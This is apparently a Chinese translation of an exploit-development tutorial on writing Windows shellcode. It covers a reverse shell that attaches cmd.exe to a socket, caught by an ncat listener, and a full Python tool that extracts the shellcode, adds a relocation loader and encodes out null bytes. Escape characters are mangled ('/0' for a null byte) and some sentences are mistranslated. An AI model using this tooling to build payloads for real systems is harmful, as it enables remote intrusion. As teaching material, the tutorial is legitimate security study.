1.创建套接字， 2.将套接字连接到 127.0.0.1:123 ， 3.创建一个执行 cmd.exe 的进程， 4.将套接字附加到进程的标准输入，标准输出以及标准错误输出， 5.等待进程被终止， 6.当进程已经终止时，则终止当前线程。

第3点与第4点同时进行，第4点调用了 CreateProcess , 攻击者可以连接到端口123上进行监听，一旦被成功连接，就可以通过套接字（ socket ）,即 TCP 连接，与运行在远程机器中的 cmd.exe 进行交互。

安装 ncat ，运行cmd并在命令行上输入：

ncat -lvp 123

此时将会在端口123上监听.

接着回到 Visual Studio 2013 ，选择 Release ，搭建项目并运行它。再回到 ncat ，你将观察到如下：

Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation.  All rights reserved.  C:/Users/Kiuhnm>ncat -lvp 123 Ncat: Version 6.47 ( http://nmap.org/ncat ) Ncat: Listening on :::123 Ncat: Listening on 0.0.0.0:123 Ncat: Connection from 127.0.0.1. Ncat: Connection from 127.0.0.1:4409. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation.  All rights reserved.  C:/Users/Kiuhnm/documents/visual studio 2013/Projects/shellcode/shellcode>

现在可以执行任意命令了。退出则输入 exi t。

main

得益于 linker 的选项

Function Order: function_order.txt

function_order.txt 中的第一行仅有一行存在 ?entryPoint@@YAHXZ 字符串，函数 entryPoint 将首先被定位在 shellcode 中。

在源码中， linker 决定了函数的顺序，因此我们可在任意函数前放入 entryPoint 。 main 函数在源码中的最后部分，因此它会在 shellcode 的结尾处被链接。当描述映射文件时，我们将了解到这是如何实现的。

0x02 Python脚本

介绍

现在，含有 shellcode 的执行体已经准备就绪，我们需要一种提取并修复 shellcode 的方法。这并不容易，我已经编写了 Python 脚本来实现：

1.提取 shellcode

2.处理字符串的重定位信息

3.通过移除 null 字节修复 shellcode

使用 PyCharm (下载地址).

该脚本只有392行，但是它有些复杂，因此我将对其进行解释：代码如下：

# Shellcode extractor by Massimiliano Tomassoli (2015) import sys import os import datetime import pefile author = 'Massimiliano Tomassoli' year = datetime.date.today().year def dword_to_bytes(value):  return [value & 0xff, (value >> 8) & 0xff, (value >> 16) & 0xff, (value >> 24) & 0xff] def bytes_to_dword(bytes):  return (bytes[0] & 0xff) | ((bytes[1] & 0xff) << 8) | /      ((bytes[2] & 0xff) << 16) | ((bytes[3] & 0xff) << 24) def get_cstring(data, offset):  '''  Extracts a C string (i.e. null-terminated string) from data starting from offset.  '''  pos = data.find('/0', offset)  if pos == -1:   return None  return data[offset:pos+1] def get_shellcode_len(map_file):  '''  Gets the length of the shellcode by analyzing map_file (map produced by VS 2013)  '''  try:   with open(map_file, 'r') as f:    lib_object = None    shellcode_len = None    for line in f:     parts = line.split()     if lib_object is not None:      if parts[-1] == lib_object:       raise Exception('_main is not the last function of %s' % lib_object)      else:       break     elif (len(parts) > 2 and parts[1] == '_main'):      # Format:      # 0001:00000274  _main   00401274 f   shellcode.obj      shellcode_len = int(parts[0].split(':')[1], 16)      lib_object = parts[-1]    if shellcode_len is None:     raise Exception('Cannot determine shellcode length')  except IOError:   print('[!] get_shellcode_len: Cannot open "%s"' % map_file)   return None  except Exception as e:   print('[!] get_shellcode_len: %s' % e.message)   return None  return shellcode_len def get_shellcode_and_relocs(exe_file, shellcode_len):  '''  Extracts the shellcode from the .text section of the file exe_file and the string  relocations.  Returns the triple (shellcode, relocs, addr_to_strings).  '''  try:   # Extracts the shellcode.   pe = pefile.PE(exe_file)   shellcode = None   rdata = None   for s in pe.sections:    if s.Name == '.text/0/0/0':     if s.SizeOfRawData < shellcode_len:      raise Exception('.text section too small')     shellcode_start = s.VirtualAddress     shellcode_end = shellcode_start + shellcode_len     shellcode = pe.get_data(s.VirtualAddress, shellcode_len)    elif s.Name == '.rdata/0/0':     rdata_start = s.VirtualAddress     rdata_end = rdata_start + s.Misc_VirtualSize     rdata = pe.get_data(rdata_start, s.Misc_VirtualSize)   if shellcode is None:    raise Exception('.text section not found')   if rdata is None:    raise Exception('.rdata section not found')   # Extracts the relocations for the shellcode and the referenced strings in .rdata.   relocs = []   addr_to_strings = {}   for rel_data in pe.DIRECTORY_ENTRY_BASERELOC:    for entry in rel_data.entries[:-1]:   # the last element's rvs is the base_rva (why?)     if shellcode_start <= entry.rva < shellcode_end:      # The relocation location is inside the shellcode.      relocs.append(entry.rva - shellcode_start)   # offset relative to the start of shellcode      string_va = pe.get_dword_at_rva(entry.rva)      string_rva = string_va - pe.OPTIONAL_HEADER.ImageBase      if string_rva < rdata_start or string_rva >= rdata_end:       raise Exception('shellcode references a section other than .rdata')      str = get_cstring(rdata, string_rva - rdata_start)      if str is None:       raise Exception('Cannot extract string from .rdata')      addr_to_strings[string_va] = str   return (shellcode, relocs, addr_to_strings)  except WindowsError:   print('[!] get_shellcode: Cannot open "%s"' % exe_file)   return None  except Exception as e:   print('[!] get_shellcode: %s' % e.message)   return None def dword_to_string(dword):  return ''.join([chr(x) for x in dword_to_bytes(dword)]) def add_loader_to_shellcode(shellcode, relocs, addr_to_strings):  if len(relocs) == 0:   return shellcode    # there are no relocations  # The format of the new shellcode is:  #    call here  #   here:  #    ...  #   shellcode_start:  #    <shellcode>   (contains offsets to strX (offset are from "here" label))  #   relocs:  #    off1|off2|...    (offsets to relocations (offset are from "here" label))  #    str1|str2|...  delta = 21           # shellcode_start - here  # Builds the first part (up to and not including the shellcode).  x = dword_to_bytes(delta + len(shellcode))  y = dword_to_bytes(len(relocs))  code = [   0xE8, 0x00, 0x00, 0x00, 0x00,      #   CALL here              # here:   0x5E,            #   POP ESI   0x8B, 0xFE,         #   MOV EDI, ESI   0x81, 0xC6, x[0], x[1], x[2], x[3],   #   ADD ESI, shellcode_start + len(shellcode) - here   0xB9, y[0], y[1], y[2], y[3],      #   MOV ECX, len(relocs)   0xFC,            #   CLD              # again:   0xAD,            #   LODSD   0x01, 0x3C, 0x07,         #   ADD [EDI+EAX], EDI   0xE2, 0xFA          #   LOOP again              # shellcode_start:  ]  # Builds the final part (offX and strX).  offset = delta + len(shellcode) + len(relocs) * 4     # offset from "here" label  final_part = [dword_to_string(r + delta) for r in relocs]  addr_to_offset = {}  for addr in addr_to_strings.keys():   str = addr_to_strings[addr]   final_part.append(str)   addr_to_offset[addr] = offset   offset += len(str)  # Fixes the shellcode so that the pointers referenced by relocs point to the  # string in the final part.  byte_shellcode = [ord(c) for c in shellcode]  for off in relocs:   addr = bytes_to_dword(byte_shellcode[off:off+4])   byte_shellcode[off:off+4] = dword_to_bytes(addr_to_offset[addr])  return ''.join([chr(b) for b in (code + byte_shellcode)]) + ''.join(final_part) def dump_shellcode(shellcode):  '''  Prints shellcode in C format ('/x12/x23...')  '''  shellcode_len = len(shellcode)  sc_array = []  bytes_per_row = 16  for i in range(shellcode_len):   pos = i % bytes_per_row   str = ''   if pos == 0:    str += '"'   str += '//x%02x' % ord(shellcode[i])   if i == shellcode_len - 1:    str += '";/n'   elif pos == bytes_per_row - 1:    str += '"/n'   sc_array.append(str)  shellcode_str = ''.join(sc_array)  print(shellcode_str) def get_xor_values(value):  '''  Finds x and y such that:  1) x xor y == value  2) x and y doesn't contain null bytes  Returns x and y as arrays of bytes starting from the lowest significant byte.  '''  # Finds a non-null missing bytes.  bytes = dword_to_bytes(value)  missing_byte = [b for b in range(1, 256) if b not in bytes][0]  xor1 = [b ^ missing_byte for b in bytes]  xor2 = [missing_byte] * 4  return (xor1, xor2) def get_fixed_shellcode_single_block(shellcode):  '''  Returns a version of shellcode without null bytes or None if the  shellcode can't be fixed.  If this function fails, use get_fixed_shellcode().  '''  # Finds one non-null byte not present, if any.  bytes = set([ord(c) for c in shellcode])  missing_bytes = [b for b in range(1, 256) if b not in bytes]  if len(missing_bytes) == 0:   return None        # shellcode can't be fixed  missing_byte = missing_bytes[0]  (xor1, xor2) = get_xor_values(len(shellcode))  code = [   0xE8, 0xFF, 0xFF, 0xFF, 0xFF,        #   CALL $ + 4                # here:   0xC0,              #   (FF)C0 = INC EAX   0x5F,              #   POP EDI   0xB9, xor1[0], xor1[1], xor1[2], xor1[3],     #   MOV ECX, <xor value 1 for shellcode len>   0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],  #   XOR ECX, <xor value 2 for shellcode len>   0x83, 0xC7, 29,          #   ADD EDI, shellcode_begin - here   0x33, 0xF6,           #   XOR ESI, ESI   0xFC,              #   CLD                # loop1:   0x8A, 0x07,           #   MOV AL, BYTE PTR [EDI]   0x3C, missing_byte,         #   CMP AL, <missing byte>   0x0F, 0x44, 0xC6,           #   CMOVE EAX, ESI   0xAA,              #   STOSB   0xE2, 0xF6            #   LOOP loop1                # shellcode_begin:  ]  return ''.join([chr(x) for x in code]) + shellcode.replace('/0', chr(missing_byte)) def get_fixed_shellcode(shellcode):  '''  Returns a version of shellcode without null bytes. This version divides  the shellcode into multiple blocks and should be used only if  get_fixed_shellcode_single_block() doesn't work with this shellcode.  '''  # The format of bytes_blocks is  #   [missing_byte1, number_of_blocks1,  # missing_byte2, number_of_blocks2, ...]  # where missing_byteX is the value used to overwrite the null bytes in the  # shellcode, while number_of_blocksX is the number of 254-byte blocks where  # to use the corresponding missing_byteX.  bytes_blocks = []  shellcode_len = len(shellcode)  i = 0  while i < shellcode_len:   num_blocks = 0   missing_bytes = list(range(1, 256))   # Tries to find as many 254-byte contiguous blocks as possible which misses at   # least one non-null value. Note that a single 254-byte block always misses at   # least one non-null value.   while True:    if i >= shellcode_len or num_blocks == 255:     bytes_blocks += [missing_bytes[0], num_blocks]     break    bytes = set([ord(c) for c in shellcode[i:i+254]])    new_missing_bytes = [b for b in missing_bytes if b not in bytes]    if len(new_missing_bytes) != 0:   # new block added     missing_bytes = new_missing_bytes     num_blocks += 1     i += 254    else:     bytes += [missing_bytes[0], num_blocks]     break  if len(bytes_blocks) > 0x7f - 5:   # Can't assemble "LEA EBX, [EDI + (bytes-here)]" or "JMP skip_bytes".   return None  (xor1, xor2) = get_xor_values(len(shellcode))  code = ([   0xEB, len(bytes_blocks)] +        #   JMP SHORT skip_bytes                # bytes:   bytes_blocks + [         #   ...                # skip_bytes:   0xE8, 0xFF, 0xFF, 0xFF, 0xFF,        #   CALL $ + 4                # here:   0xC0,              #   (FF)C0 = INC EAX   0x5F,              #   POP EDI   0xB9, xor1[0], xor1[1], xor1[2], xor1[3],     #   MOV ECX, <xor value 1 for shellcode len>   0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],  #   XOR ECX, <xor value 2 for shellcode len>   0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,  #   LEA EBX, [EDI + (bytes - here)]   0x83, 0xC7, 0x30,           #   ADD EDI, shellcode_begin - here                # loop1:   0xB0, 0xFE,           #   MOV AL, 0FEh   0xF6, 0x63, 0x01,           #   MUL AL, BYTE PTR [EBX+1]   0x0F, 0xB7, 0xD0,           #   MOVZX EDX, AX   0x33, 0xF6,           #   XOR ESI, ESI   0xFC,              #   CLD                # loop2:   0x8A, 0x07,           #   MOV AL, BYTE PTR [EDI]   0x3A, 0x03,           #   CMP AL, BYTE PTR [EBX]   0x0F, 0x44, 0xC6,           #   CMOVE EAX, ESI   0xAA,              #   STOSB   0x49,              #   DEC ECX   0x74, 0x07,           #   JE shellcode_begin   0x4A,              #   DEC EDX   0x75, 0xF2,           #   JNE loop2   0x43,              #   INC EBX   0x43,              #   INC EBX   0xEB, 0xE3            #   JMP loop1                # shellcode_begin:  ])  new_shellcode_pieces = []  pos = 0  for i in range(len(bytes_blocks) / 2):   missing_char = chr(bytes_blocks[i*2])   num_bytes = 254 * bytes_blocks[i*2 + 1]   new_shellcode_pieces.append(shellcode[pos:pos+num_bytes].replace('/0', missing_char))   pos += num_bytes  return ''.join([chr(x) for x in code]) + ''.join(new_shellcode_pieces) def main():  print("Shellcode Extractor by %s (%d)/n" % (author, year))  if len(sys.argv) != 3:   print('Usage:/n' +      '  %s <exe file> <map file>/n' % os.path.basename(sys.argv[0]))   return  exe_file = sys.argv[1]  map_file = sys.argv[2]  print('Extracting shellcode length from "%s"...' % os.path.basename(map_file))  shellcode_len = get_shellcode_len(map_file)  if shellcode_len is None:   return  print('shellcode length: %d' % shellcode_len)  print('Extracting shellcode from "%s" and analyzing relocations...' % os.path.basename(exe_file))  result = get_shellcode_and_relocs(exe_file, shellcode_len)  if result is None:   return  (shellcode, relocs, addr_to_strings) = result  if len(relocs) != 0:   print('Found %d reference(s) to %d string(s) in .rdata' % (len(relocs), len(addr_to_strings)))   print('Strings:')   for s in addr_to_strings.values():    print('  ' + s[:-1])   print('')   shellcode = add_loader_to_shellcode(shellcode, relocs, addr_to_strings)  else:   print('No relocations found')  if shellcode.find('/0') == -1:   print('Unbelievable: the shellcode does not need to be fixed!')   fixed_shellcode = shellcode  else:   # shellcode contains null bytes and needs to be fixed.   print('Fixing the shellcode...')   fixed_shellcode = get_fixed_shellcode_single_block(shellcode)   if fixed_shellcode is None:    # if shellcode wasn't fixed...    fixed_shellcode = get_fixed_shellcode(shellcode)    if fixed_shellcode is None:     print('[!] Cannot fix the shellcode')  print('final shellcode length: %d/n' % len(fixed_shellcode))  print('char shellcode[] = ')  dump_shellcode(fixed_shellcode) main()

映射文件以及 `shellcode` 长度

在 linker 中使用如下选项来生成映射文件：

Debugging:
- Generate Map File: Yes (/MAP)

告诉 linker 生成含有EXE结构的映射文件。

* Map File Name: mapfile

该映射文件主要用于判断 shellcode 长度。

这里是映射文件的相关部分：

shellcode   Timestamp is 54fa2c08 (Fri Mar 06 23:36:56 2015)   Preferred load address is 00400000   Start         Length     Name                   Class  0001:00000000 00000a9cH .text$mn                CODE  0002:00000000 00000094H .idata$5                DATA  0002:00000094 00000004H .CRT$XCA                DATA  0002:00000098 00000004H .CRT$XCAA               DATA  0002:0000009c 00000004H .CRT$XCZ                DATA  0002:000000a0 00000004H .CRT$XIA                DATA  0002:000000a4 00000004H .CRT$XIAA               DATA  0002:000000a8 00000004H .CRT$XIC                DATA  0002:000000ac 00000004H .CRT$XIY                DATA  0002:000000b0 00000004H .CRT$XIZ                DATA  0002:000000c0 000000a8H .rdata                  DATA  0002:00000168 00000084H .rdata$debug            DATA  0002:000001f0 00000004H .rdata$sxdata           DATA  0002:000001f4 00000004H .rtc$IAA                DATA  0002:000001f8 00000004H .rtc$IZZ                DATA  0002:000001fc 00000004H .rtc$TAA                DATA  0002:00000200 00000004H .rtc$TZZ                DATA  0002:00000208 0000005cH .xdata$x                DATA  0002:00000264 00000000H .edata                  DATA  0002:00000264 00000028H .idata$2                DATA  0002:0000028c 00000014H .idata$3                DATA  0002:000002a0 00000094H .idata$4                DATA  0002:00000334 0000027eH .idata$6                DATA  0003:00000000 00000020H .data                   DATA  0003:00000020 00000364H .bss                    DATA  0004:00000000 00000058H .rsrc$01                DATA  0004:00000060 00000180H .rsrc$02                DATA    Address         Publics by Value              Rva+Base       Lib:Object   0000:00000000       ___guard_fids_table        00000000     <absolute>  0000:00000000       ___guard_fids_count        00000000     <absolute>  0000:00000000       ___guard_flags             00000000     <absolute>  0000:00000001       ___safe_se_handler_count   00000001     <absolute>  0000:00000000       ___ImageBase               00400000     <linker-defined>  0001:00000000       ?entryPoint@@YAHXZ         00401000 f   shellcode.obj  0001:000001a1       ?getHash@@YAKPBD@Z         004011a1 f   shellcode.obj  0001:000001be       ?getProcAddrByHash@@YAPAXK@Z 004011be f   shellcode.obj  0001:00000266       _main                      00401266 f   shellcode.obj  0001:000004d4       _mainCRTStartup            004014d4 f   MSVCRT:crtexe.obj  0001:000004de       ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z 004014de f   MSVCRT:unhandld.obj  0001:0000051f       ___CxxSetUnhandledExceptionFilter 0040151f f   MSVCRT:unhandld.obj  0001:0000052e       __XcptFilter               0040152e f   MSVCRT:MSVCR120.dll <snip>

从映射文件的开头得知， section 1 为 .text 节，它含有代码：

Start         Length     Name                   Class 0001:00000000 00000a9cH .text$mn                CODE

第二部分表明 .text 节起始于 ?entryPoint@@YAHXZ ，这是我们的 entryPoint 函数，最后一个函数是函数 main （这里被称作 _main ）。因为 main 函数在偏移 0x266 上，并且 entryPoint 函数位于``，我们的 shellcode 起始于 .text 节的开头，并且长度为 0x266 字节。

使用python实现：

def get_shellcode_len(map_file):  '''  Gets the length of the shellcode by analyzing map_file (map produced by VS 2013)  '''  try:   with open(map_file, 'r') as f:    lib_object = None    shellcode_len = None    for line in f:     parts = line.split()     if lib_object is not None:      if parts[-1] == lib_object:       raise Exception('_main is not the last function of %s' % lib_object)      else:       break     elif (len(parts) > 2 and parts[1] == '_main'):      # Format:      # 0001:00000274  _main   00401274 f   shellcode.obj      shellcode_len = int(parts[0].split(':')[1], 16)      lib_object = parts[-1]    if shellcode_len is None:     raise Exception('Cannot determine shellcode length')  except IOError:   print('[!] get_shellcode_len: Cannot open "%s"' % map_file)   return None  except Exception as e:   print('[!] get_shellcode_len: %s' % e.message)   return None  return shellcode_len

提取 shellcode

这部分非常容易理解，我们知道 shellcode 的长度并且知道 shellcode 被定位在 .text 节的起始部分。代码如下：

def get_shellcode_and_relocs(exe_file, shellcode_len):  '''  Extracts the shellcode from the .text section of the file exe_file and the string  relocations.  Returns the triple (shellcode, relocs, addr_to_strings).  '''  try:   # Extracts the shellcode.   pe = pefile.PE(exe_file)   shellcode = None   rdata = None   for s in pe.sections:    if s.Name == '.text/0/0/0':     if s.SizeOfRawData < shellcode_len:      raise Exception('.text section too small')     shellcode_start = s.VirtualAddress     shellcode_end = shellcode_start + shellcode_len     shellcode = pe.get_data(s.VirtualAddress, shellcode_len)    elif s.Name == '.rdata/0/0':     <snip>   if shellcode is None:    raise Exception('.text section not found')   if rdata is None:    raise Exception('.rdata section not found') <snip>

我使用了模块 pefile ( 下载地址 ). 相关的部分是 if 语句体。

字符串和.rdata

正如之前所说的， c/c++ 代码可能含有字符串。例如，我们的 shellcode 含有如下代码：

My_CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sInfo, &procInfo);

字符串 cmd.exe 被定位在 .rdata 节中，该节是一个只读的含有数据（已被初始化）的节。该代码对字符串进行绝对地址引用。

00241152 50                   push        eax   00241153 8D 44 24 5C          lea         eax,[esp+5Ch]   00241157 C7 84 24 88 00 00 00 00 01 00 00 mov         dword ptr [esp+88h],100h   00241162 50                   push        eax   00241163 52                   push        edx   00241164 52                   push        edx   00241165 52                   push        edx   00241166 6A 01                push        1   00241168 52                   push        edx   00241169 52                   push        edx   0024116A 68 18 21 24 00       push        242118h         <------------------------ 0024116F 52                   push        edx   00241170 89 B4 24 C0 00 00 00 mov         dword ptr [esp+0C0h],esi   00241177 89 B4 24 BC 00 00 00 mov         dword ptr [esp+0BCh],esi   0024117E 89 B4 24 B8 00 00 00 mov         dword ptr [esp+0B8h],esi   00241185 FF 54 24 34          call        dword ptr [esp+34h]

正如我们观察到的， cmd.exe 的绝对地址是 242118h 。注意该地址是push指令的一部分并且该绝对地址被定位在了 24116Bh 。如果我们用某个文件编辑器检测文件 cmd.exe ,我们看到如下：

56A: 68 18 21 40 00           push        000402118h

在文件中 56Ah 是偏移量。因为 image base 的偏移量为 400000h ，所以对应的虚拟地址是 40116A 。在内存中，这应该是执行体被加载的首选的（ preferred ）地址。执行体在指令中的绝对地址是 402118h ，如果执行体在首选的基地址上被加载，即表明已正确执行。然而，如果执行体在不同的基地址上被加载，那么需要修复指令。Windows如何知道执行体含有需要被修复的地址？PE文件含有一个相对目录（ Relocation Directory ），在我们的案例中它指向 .reloc 节。该相对目录中包含所有需要被修复的位置上的 RVA 。

可以检查该目录并寻找如下所描述的位置上的地址

1.在 shellcode 中含有的（即从 .text:0 到末尾， main 函数除外）， 2.含有 .rdata 中的数据指针。

例如，在其他地址中， Relocation Directory 将包含位于指令 push 402118h 的后四个字节的地址 40116Bh 。这些字节构成了地址 402118h ，它指向在 .rdata 中的字符串 cmd.exe （起始于地址 402000h ）。

观察函数 get_shellcode_and_reloc s。在第一部分我们提取 .rdata 节：

def get_shellcode_and_relocs(exe_file, shellcode_len):  '''  Extracts the shellcode from the .text section of the file exe_file and the string  relocations.  Returns the triple (shellcode, relocs, addr_to_strings).  '''  try:   # Extracts the shellcode.   pe = pefile.PE(exe_file)   shellcode = None   rdata = None   for s in pe.sections:    if s.Name == '.text/0/0/0':     <snip>    elif s.Name == '.rdata/0/0':     rdata_start = s.VirtualAddress     rdata_end = rdata_start + s.Misc_VirtualSize     rdata = pe.get_data(rdata_start, s.Misc_VirtualSize)   if shellcode is None:    raise Exception('.text section not found')   if rdata is None:    raise Exception('.rdata section not found')

将loader添加到shellcode

方法是将被包含在 addr_to_strings 中的字符串添加到我们 shellcode 的尾部，然后让我们的代码引用那些字符串。

不幸的是，代码->字符串的链接过程必须在运行时完成，因为我们不知道 shellcode 的起始地址，那么我们需要准备一个在运行时修复 shellcode 的“ loader ”。这是转化后的 shellcode 结构:

Exploit开发系列教程-Windows基础&shellcode

OffX 是指向原 shellcode 中重定位信息的 DWORD 值，它们需要被修复。 loader 将修复这些地址来让它们指向正确的字符串 strX 。试图理解以下代码来了解实现原理：

def add_loader_to_shellcode(shellcode, relocs, addr_to_strings):  if len(relocs) == 0:   return shellcode    # there are no relocations  # The format of the new shellcode is:  #    call here  #   here:  #    ...  #   shellcode_start:  #    <shellcode>   (contains offsets to strX (offset are from "here" label))  #   relocs:  #    off1|off2|...    (offsets to relocations (offset are from "here" label))  #    str1|str2|...  delta = 21           # shellcode_start - here  # Builds the first part (up to and not including the shellcode).  x = dword_to_bytes(delta + len(shellcode))  y = dword_to_bytes(len(relocs))  code = [   0xE8, 0x00, 0x00, 0x00, 0x00,      #   CALL here              # here:   0x5E,            #   POP ESI   0x8B, 0xFE,         #   MOV EDI, ESI   0x81, 0xC6, x[0], x[1], x[2], x[3],   #   ADD ESI, shellcode_start + len(shellcode) - here   0xB9, y[0], y[1], y[2], y[3],      #   MOV ECX, len(relocs)   0xFC,            #   CLD              # again:   0xAD,            #   LODSD   0x01, 0x3C, 0x07,         #   ADD [EDI+EAX], EDI   0xE2, 0xFA          #   LOOP again              # shellcode_start:  ]  # Builds the final part (offX and strX).  offset = delta + len(shellcode) + len(relocs) * 4     # offset from "here" label  final_part = [dword_to_string(r + delta) for r in relocs]  addr_to_offset = {}  for addr in addr_to_strings.keys():   str = addr_to_strings[addr]   final_part.append(str)   addr_to_offset[addr] = offset   offset += len(str)  # Fixes the shellcode so that the pointers referenced by relocs point to the  # string in the final part.  byte_shellcode = [ord(c) for c in shellcode]  for off in relocs:   addr = bytes_to_dword(byte_shellcode[off:off+4])   byte_shellcode[off:off+4] = dword_to_bytes(addr_to_offset[addr])  return ''.join([chr(b) for b in (code + byte_shellcode)]) + ''.join(final_part)

观察 loader ：

CALL here                   ; PUSH EIP+5; JMP here   here:     POP ESI                     ; ESI = address of "here"     MOV EDI, ESI                ; EDI = address of "here"     ADD ESI, shellcode_start + len(shellcode) - here        ; ESI = address of off1     MOV ECX, len(relocs)        ; ECX = number of locations to fix     CLD                         ; tells LODSD to go forwards   again:     LODSD                       ; EAX = offX; ESI += 4     ADD [EDI+EAX], EDI          ; fixes location within shellcode     LOOP again                  ; DEC ECX; if ECX > 0 then JMP again   shellcode_start:     <shellcode>   relocs:     off1|off2|...     str1|str2|...

首先，使用 CALL 来获取 here 在内存中的绝对地址。 loader 使用该信息对原 shellcode 中的偏移进行修复。 ESI 指向 off1 ，因此使用 LODSD 来逐一读取偏移。该指令

ADD [EDI+EAX], EDI

用于修复 shellcode 中的地址。 EAX 是当前的 offX ， offX 是与 here 相关的地址偏移。这意味着 EDI+EAX 是那个位置上的绝对地址。 DWORD 值在那个地址上包含相对于 here 的字符串偏移。通过将 EDI 添加到那个 DWORD 值，我们将该 DWORD 值转换为该字符串的绝对地址。当 loader 已经执行完毕时， shellcode 已被修复，同时也被成功执行。

总结，如果存在重定位信息，那么会调用 add_loader_to_shellcode 。可在 main 函数中观察到：

<snip>  if len(relocs) != 0:   print('Found %d reference(s) to %d string(s) in .rdata' % (len(relocs), len(addr_to_strings)))   print('Strings:')   for s in addr_to_strings.values():    print('  ' + s[:-1])   print('')   shellcode = add_loader_to_shellcode(shellcode, relocs, addr_to_strings)  else:   print('No relocations found') <snip>

从 `shellcode` 中移除 `null` 字节 (I)

编写如下两个函数来删去 null 字节。

1.get_fixed_shellcode_single_block 2.get_fixed_shellcode

可以试试使用第一个函数生成更短的代码，但是这样做不一定可被执行。但是如果使用第二个函数生成更长的代码，则必定可被执行。

首先观察 get_fixed_shellcode_single_block 函数，该函数的定义如下：

def get_fixed_shellcode_single_block(shellcode):  '''  Returns a version of shellcode without null bytes or None if the  shellcode can't be fixed.  If this function fails, use get_fixed_shellcode().  '''  # Finds one non-null byte not present, if any.  bytes = set([ord(c) for c in shellcode])  missing_bytes = [b for b in range(1, 256) if b not in bytes]  if len(missing_bytes) == 0:   return None        # shellcode can't be fixed  missing_byte = missing_bytes[0]  (xor1, xor2) = get_xor_values(len(shellcode))  code = [   0xE8, 0xFF, 0xFF, 0xFF, 0xFF,        #   CALL $ + 4                # here:   0xC0,              #   (FF)C0 = INC EAX   0x5F,              #   POP EDI   0xB9, xor1[0], xor1[1], xor1[2], xor1[3],     #   MOV ECX, <xor value 1 for shellcode len>   0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],  #   XOR ECX, <xor value 2 for shellcode len>   0x83, 0xC7, 29,          #   ADD EDI, shellcode_begin - here   0x33, 0xF6,           #   XOR ESI, ESI   0xFC,              #   CLD                # loop1:   0x8A, 0x07,           #   MOV AL, BYTE PTR [EDI]   0x3C, missing_byte,         #   CMP AL, <missing byte>   0x0F, 0x44, 0xC6,           #   CMOVE EAX, ESI   0xAA,              #   STOSB   0xE2, 0xF6            #   LOOP loop1                # shellcode_begin:  ]  return ''.join([chr(x) for x in code]) + shellcode.replace('/0', chr(missing_byte))

逐字节地分析 shellcode 并了解下这是否为被忽略的值，即从不出现在 shellcode 中的值。我们来了解下值 0x14 .如果我们用该值替换在 shellcode 中的每个 0x00 ，那么 shellcode 将不再含有 null 字节，但是会因为被修改了而无法执行。最后是将一些 decoder 添加到 shellcode ，在运行时时，在原 shellcode 被执行前将重置null字节。如下：

CALL $ + 4                                  ; PUSH "here"; JMP "here"-1 here:   (FF)C0 = INC EAX                            ; not important: just a NOP   POP EDI                                     ; EDI = "here"   MOV ECX, <xor value 1 for shellcode len>   XOR ECX, <xor value 2 for shellcode len>    ; ECX = shellcode length   ADD EDI, shellcode_begin - here             ; EDI = absolute address of original shellcode   XOR ESI, ESI                                ; ESI = 0   CLD                                         ; tells STOSB to go forwards loop1:   MOV AL, BYTE PTR [EDI]                      ; AL = current byte of the shellcode   CMP AL, <missing byte>                      ; is AL the special byte?   CMOVE EAX, ESI                              ; if AL is the special byte, then EAX = 0   STOSB                                       ; overwrite the current byte of the shellcode with AL   LOOP loop1                                  ; DEC ECX; if ECX > 0 then JMP loop1 shellcode_begin:

这里有两个需要重点讨论的细节。首先，该代码不能含有 null 字节，因为我们需要另一段代码来移除他们

Exploit开发系列教程-Windows基础&shellcode

正如你看到的， CALL 指令不会跳转到 here ，因为操作码（ opcode ）

E8 00 00 00 00               #   CALL here

包含四个 null 字节. 因为 CALL 指令为 5个字节, 所以 CALL here 指令等价于 CALL $+5 .除去 nul l字节的技巧是使用指令 CALL $+4 ：

E8 FF FF FF FF               #   CALL $+4

那CALL跳过4个字节并jmp到CALL本身的最后一个FF。由字节C0紧接着CALL指令，因此在CALL指令执行之后该指令INC EAX对应的操作码FF C0会被执行。注意CALL指令中已压入栈的值仍然是here标记的绝对地址

这是除去null字节的第二种技巧：

MOV ECX, XOR ECX,

我们可以只是使用：

MOV ECX,

但是这将不会生成null字节。而实际上，shellcode的长度为0x400，我们将会看到该指令

B9 00 04 00 00 MOV ECX, 400h

存在3个null字节。

为了避免存在该问题，我们选择使用一个不会出现在 00000400h 中的 non-null 字节。我们选择使用 0x01 .现在我们计算如下：

<xor value 1 for shellcode len> = 00000400h xor 01010101 = 01010501h <xor value 2 for shellcode len> = 01010101h

在指令中使用 <xor value 1 for shellcode len> 和 <xor value 2 for shellcode len> 对应的操作码都不存在 null 字节，并且在执行 xor 操作后，生成的原始值为 400h 。

对应的两条指令将会是：

B9 01 05 01 01        MOV ECX, 01010501h 81 F1 01 01 01 01     XOR ECX, 01010101h

通过函数 get_xor_values 来计算 xor 值。

正如以上提到过的，该代码很容易理解：通过逐字节检查 shellcode 来用特定的值（ 0x14 ，在之前的范例中）覆写 null 字节。

从shellcode中移除null字节(II)

如上的方法会失败，因为我们不能找到从不在 shellcode 中出现过的字节值。如果失败了，我们需要使用 get_fixed_shellcode ，但是它更为复杂。

方法是将 shellcode 分为多个 254 字节的块。注意每个块必须存在一个 “ missing byte ”，因为一个字节可以具有 255 个非0值。我们可以对每个块进行逐个处理来为每个块选择 missing byte 。但是这样做可能效率不高，因为对于一段具有 254*N 个字节的 shellcode 来说，我们需要在 shellcode（ 存在识别 missing bytes 的 decoder ）被处理之前或之后存储N个 “ missing bytes ”。最有效的做法是，为尽可能多个254字节的块使用相同的“ missing bytes ”。我们从 shellcode 的起始部分开始对块进行处理，直到处理完最后一个块。最后，我们会有 <missing_byte, num_blocks> 配对的列表：

[(missing_byte1, num_blocks1), (missing_byte2, num_blocks2), ...]

我已决定将 num_blocksX 限制为一个单一字节，因此， num_blocksX 的值会在1到255之间。

此处是 get_fixed_shellcode 部分，该部分将 shellcode 分为多个块。

